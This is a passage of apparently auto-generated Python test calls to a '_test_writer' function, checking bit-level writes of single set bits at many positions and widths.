_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 8, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 7, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 6, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 5, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 4, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 3, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 2, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 1, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 64, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 63, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 62, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 61, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 60, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 59, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 58, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 57, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 56, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 55, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 54, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 53, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 52, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 51, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 50, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 49, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 48, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 47, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 46, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 45, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 44, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 43, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 42, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 41, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 40, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 39, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 38, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 37, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 36, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 35, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 34, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 33, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 32, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 31, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 30, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 29, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 28, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 27, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 26, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 25, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 24, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 23, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 22, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 21, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 20, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 19, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 18, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 17, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 16, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 15, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 14, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 13, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 12, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 11, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 10, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 9, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 8, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 7, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 6, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 5, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 4, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 3, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 2, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 1, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 64, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 63, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 62, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 61, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 60, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 59, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 58, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 57, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 56, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 55, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 54, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 53, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 52, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 51, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 50, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 49, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 48, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 47, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 46, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 45, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 44, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 43, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 42, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 41, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 40, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 39, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 38, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 37, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 36, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 35, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 34, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 33, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 32, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 31, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 30, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 29, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 28, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 27, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 26, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 25, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 24, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 23, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 22, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 21, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 20, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 19, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 18, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 17, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 16, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 15, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 14, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 13, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 12, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 11, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 10, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 9, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 8, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 7, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 6, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 5, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 4, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 3, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 2, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 1, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 64, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 63, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 62, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 61, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 60, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 59, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 58, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 57, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 56, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 55, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 54, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 53, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 52, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 51, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 50, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 49, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 48, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 47, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 46, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 45, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 44, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 43, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 42, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 41, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 40, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 39, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 38, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 37, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 36, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 35, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 34, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 33, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 32, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 31, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 30, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 29, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 28, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 27, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 26, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 25, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 24, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 23, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 22, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 21, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 20, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 19, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 18, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 17, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 16, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 15, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 14, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 13, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 12, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 11, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 10, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 9, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 8, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 7, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 6, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 5, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\00\x00\x00\x00\x00\x00\x00\x00", 4, 3, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 2, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 1, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 64, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 63, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 62, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 61, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 60, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 59, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 58, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 57, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 56, False, 1)
